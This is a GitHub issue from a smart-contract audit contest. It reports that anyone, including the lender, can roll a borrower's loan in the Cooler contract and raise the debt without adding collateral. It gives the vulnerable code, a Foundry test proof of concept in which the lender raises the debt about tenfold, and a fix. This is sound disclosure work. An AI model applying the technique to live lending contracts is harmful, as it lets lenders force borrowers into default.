Skip to content
This repository has been archived by the owner on Mar 3, 2024. It is now read-only.

libratus - Anyone can roll the loan on behalf of the borrower increasing the debt #237

Closed
sherlock-admin2 opened this issue Aug 28, 2023 · 0 comments
Closed

libratus - Anyone can roll the loan on behalf of the borrower increasing the debt #237

sherlock-admin2 opened this issue Aug 28, 2023 · 0 comments
Labels
Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label Medium A valid Medium severity issue Reward A payout will be made for this issue

Comments

@sherlock-admin2
Copy link
Contributor

sherlock-admin2 commented Aug 28, 2023
edited by sherlock-admin
Loading

libratus

high

Anyone can roll the loan on behalf of the borrower increasing the debt

Summary

Depending on the roll conditions it may be possible to roll the loan without having to add more collateral and just increase the debt for the borrower. This attack can be easily implemented by the lender themselves.

Vulnerability Detail

Rolling a loan is permissionless. Under normal conditions it requires providing more collateral so it is usually not in the interest of anyone other than the borrower. However, if loanToCollateral changes for the roll, then newCollateral may be 0. This case is handled in code.

        if (newCollateral > 0) {
            collateral().safeTransferFrom(msg.sender, address(this), newCollateral);
        }

However, rolling will still increase the debt of the loan

        uint256 newDebt = interestFor(loan.amount, loan.request.interest, loan.request.duration);

        // Update memory accordingly.
        loan.amount += newDebt;

Increasing the debt can be in the interest of the lender, so lender can set up this scenario and force the borrower to pay more debt.

PoC

    function test_roll_increaseDebt() public {
        uint256 amount = 1e18;

        cooler = _initCooler();
        (uint256 reqID, ) = _requestLoan(amount);
        uint256 loanID = _clearLoan(reqID, amount, true, false);

        vm.prank(lender);
        cooler.provideNewTermsForRoll( // Set conditions favorable for the lender. Increase LTC to avoid paying extra collateral
            loanID,
            INTEREST_RATE * 10000,
            LOAN_TO_COLLATERAL * 2,
            1
        );

        Cooler.Loan memory oldLoan = cooler.getLoan(loanID);

        vm.prank(lender);
        cooler.rollLoan(loanID); // No new collateral needed

        Cooler.Loan memory newLoan = cooler.getLoan(loanID);

        // New amount - 9222966785513229497, Old amount - 1000410958904109589. Debt increased tenfold
        assertGt(newLoan.amount, oldLoan.amount);
    }

Impact

Lender can increase borrower's debt forcing a default.

Code Snippet

https://github.com/sherlock-audit/2023-08-cooler/blob/main/Cooler/src/Cooler.sol#L192

Tool used

Manual Review

Recommendation

The safest option is to only allow rolling a loan by the borrower

Duplicate of #26
@github-actions github-actions bot closed this as completed Sep 1, 2023
@github-actions github-actions bot added Medium A valid Medium severity issue Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label labels Sep 1, 2023
@sherlock-admin sherlock-admin changed the title Large Rainbow Squirrel - Anyone can roll the loan on behalf of the borrower increasing the debt libratus - Anyone can roll the loan on behalf of the borrower increasing the debt Sep 12, 2023
@sherlock-admin sherlock-admin added the Reward A payout will be made for this issue label Sep 12, 2023
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
Duplicate A valid issue that is a duplicate of an issue with `Has Duplicates` label Medium A valid Medium severity issue Reward A payout will be made for this issue
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@sherlock-admin @sherlock-admin2